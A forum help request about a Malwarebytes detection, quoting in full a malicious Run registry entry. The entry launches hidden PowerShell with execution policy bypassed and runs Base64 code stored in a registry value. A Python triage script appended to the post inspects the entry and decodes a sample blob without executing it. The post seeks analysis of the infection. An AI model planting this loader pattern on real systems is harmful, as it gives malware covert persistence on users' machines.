Hey, new user on the Malwarebytes forums here.
OK, so I scanned my computer with Malwarebytes, and it detected "PUP.Optional.PowerShellSP".
And that's OK, I mean it's just one threat, right? But I started checking the actual registry key, and this MF is actually running PowerShell, which runs (binary?) code stored in my registry.
Does anyone want to check what the code was doing?
Here's the registry entry that Malwarebytes detected:
"{F119BFAB-D0C9-4E62-9DCF-7923777499B1}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));"
I kinda wanted to post this in the "new malware" category, since the registry entry that it executes wasn't detected by Malwarebytes, but it did detect the part where it runs.
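
An added example, not part of the original post: a small Python triage of the autorun value quoted above that lists the traits making it suspicious, extracts the registry key and value name the loader reads, and decodes a Base64 blob to text for reading without executing it. The indicator names, the regexes and the sample blob are this example's own constructions; the real value data is not on the page.

```python
import base64
import re

# Run value exactly as quoted in the post (.reg export form: backslashes doubled).
RUN_VALUE = r"""C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));"""

# Traits of this autorun pattern; names and regexes are this example's own.
INDICATORS = {
    "hidden_window": r"-(windowstyle|w)\s+hidden",
    "policy_bypass": r"-(executionpolicy|ep)\s+bypass",
    "invoke_expression": r"\b(iex|invoke-expression)\b",
    "base64_decode": r"FromBase64String",
    "registry_read": r"\b(gp|get-itemproperty)\b",
}

# Constructed stand-in for the value data; the real blob is not on the page.
SAMPLE_TEXT = "Write-Output 'constructed sample'"
SAMPLE_BLOB = base64.b64encode(SAMPLE_TEXT.encode("ascii")).decode("ascii")


def triage(run_value):
    """Return (indicator names hit, registry key, value name) for one Run value."""
    cmd = run_value.replace("\\\\", "\\")  # undo .reg escaping of backslashes
    hits = sorted(n for n, rx in INDICATORS.items() if re.search(rx, cmd, re.I))
    # The loader reads its payload with: (gp '<key>').<value name>
    m = re.search(r"\(\s*(?:gp|get-itemproperty)\s+'([^']+)'\s*\)\.(\w+)", cmd, re.I)
    return hits, (m.group(1) if m else None), (m.group(2) if m else None)


def decode_blob(b64_text):
    """Decode the stored blob to text for reading only; nothing is executed."""
    raw = base64.b64decode(b64_text, validate=True)
    # The loader calls ASCII.GetString, so decode as ASCII and mark anything else.
    return raw.decode("ascii", errors="replace")


if __name__ == "__main__":
    hits, key, name = triage(RUN_VALUE)
    print("indicators:", ", ".join(hits))
    print("payload stored at:", key, "value:", name)
    print("decoded sample:", decode_blob(SAMPLE_BLOB))
```

To read the actual script, pass the exported data of the value named by `triage` to `decode_blob` in place of the sample.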